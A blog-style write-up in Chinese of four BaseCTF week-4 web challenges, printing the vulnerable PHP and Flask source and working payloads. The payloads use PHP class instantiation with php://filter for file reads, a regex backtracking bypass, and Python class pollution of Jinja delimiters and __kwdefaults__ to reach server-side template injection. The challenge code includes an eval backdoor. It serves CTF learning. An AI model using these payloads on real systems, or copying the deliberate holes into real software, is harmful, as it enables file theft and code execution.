Basectf

web

week4

flag直接读取不就行了?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
highlight_file('index.php');
\# 我把flag藏在一个secret文件夹里面了,所以要学会遍历啊~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
  echo($f . '<br>');
}
echo new $J1ng($Hong);
?>

$Keng:这里我们使用 PHP 内置的 DirectoryIterator 类来遍历目录。

$Wang:指定要遍历的目录为 /secret

$foreach循环:遍历 $dir,并输出每个文件的名称。

找到flag在/secret文件夹的f11444g.php

使用 SplFileObject 类读取

1
2
3
?K=DirectoryIterator&W=/secret

J=SplFileObject&H=php://filter/convert.base64-encode/resource=/secret/f11444g.php

Fin

JinjaMark

两个路由,一个是/index,一个是/flag。

前往/flag,用bp爆破出幸运数字然后上传会得到部分源码,根据源码可知在/magic路由下可以进行原型链污染以及/index中存在的黑名单。

在/magic路由下污染jinja的语法标识符,将”,“修改为”<<”,”>>”或者其他不影响ssti注入的符号

1
2
3
4
5
6
7
8
9
10
11
{
    "__init__" : {
        "__globals__" : {
            "app" : {
                    "jinja_env" :{
"variable_start_string" : "<<","variable_end_string":">>"
}        
            }
        }
    }
}

传入后去/index进行无过滤的ssti注入即可

1z_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
highlight_file('index.php');
\# 我记得她...好像叫flag.php吧?
$emp=$_GET['e_m.p'];
$try=$_POST['try'];
if($emp!="114514"&&intval($emp,0)===114514)
{
  for ($i=0;$i<strlen($emp);$i++){
    if (ctype_alpha($emp[$i])){
      die("你不是hacker?那请去外场等候!");
    }
  }
  echo "只有真正的hacker才能拿到flag!"."<br>";

  if (preg_match('/.+?HACKER/is',$try)){
    die("你是hacker还敢自报家门呢?");
  }
  if (!stripos($try,'HACKER') === TRUE){
    die("你连自己是hacker都不承认,还想要flag呢?");
  }

  $a=$_GET['a'];
  $b=$_GET['b'];
  $c=$_GET['c'];
  if(stripos($b,'php')!==0){
    die("收手吧hacker,你得不到flag的!");
  }
  echo (new $a($b))->$c();
}
else
{
  die("114514到底是啥意思嘞?。?");
}
\# 觉得困难的话就直接把shell拿去用吧,不用谢~
$shell=$_POST['shell'];
eval($shell);
?>

payload

1
2
3
e[m.p=114514.1&a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php&c=__toString"

data = {"try":"-"*1000001+"HACKER"})

lucky_number

前往**/flag**,可以得到部分源码以及提示。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from flask import Flask,request,render_template_string,render_template
from jinja2 import Template
import json
import heaven
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class cls():
    def __init__(self):
        pass

instance = cls()

BLACKLIST_IN_index = ['{','}']
def is_json(data):
    try:
        json.loads(data)
        return True
    except ValueError:
        return False

@app.route('/m4G1c',methods=['POST', 'GET'])
def pollute():
    if request.method == 'POST':
        if request.is_json:
            merge(json.loads(request.data), instance)
            result = heaven.create()
            message = result["message"]
            return "这个魔术还行吧
" + message
        else:
            return "我要json的魔术"
    return "记得用POST方法把魔术交上来"


#heaven.py

def create(kon="Kon", pure="Pure", *, confirm=False):
    if confirm and "lucky_number" not in create.__kwdefaults__:
        return {"message": "嗯嗯,我已经知道你要创造东西了,但是你怎么不告诉我要创造什么?", "lucky_number": "nope"}
    if confirm and "lucky_number" in create.__kwdefaults__:
        return {"message": "这是你的lucky_number,请拿好,去/check下检查一下吧", "lucky_number": create.__kwdefaults__["lucky_number"]}

    return {"message": "你有什么想创造的吗?", "lucky_number": "nope"}

根据代码可知在**/m4G1c路由下存在着导致原型链污染的merge函数,再结合其它提示可知此处是要污染heaven.pycreate函数的kwdefaults属性,该属性存储的是仅关键字参数,即位于之后的参数。由于create函数在另一个模块中,我们需要利用sys模块的modules属性来获取到heaven.py,但是代码中并没有导入sys模块。那么该怎么获取到这个模块呢?在python中存在着*spec内置属性,包含了关于类加载时的信息,定义在Lib/importlib/_bootstrap.py的类ModuleSpec,所以可以直接采用<模块名>.spec.init.globals[‘sys’]**获取到sys模块,此处就可以使用json模块获取,最终的payload如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{
    "__init__": {
        "__globals__": {
            "json":{
                "__spec__":{
                    "__init__" : {
                        "__globals__" : {
                            "sys" : {
                                "modules" : {
                                    "heaven" : {
                                        "create" : {
                                              "__kwdefaults__" : {
                                              "confirm" : true,
                                              "lucky_number" : "5346"
                                             } 
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

在**/m4G1c传入该payload之后,根据回显可知要前往/check,前往查看之后发现污染成功,可以直接前往/ssSstTti1** 进行无过滤的ssti注入,前往注入即可

比赛
#比赛
Basectf
http://example.com/2024/09/18/比赛/Basectf/
作者
Englobe
发布于
2024年9月18日
许可协议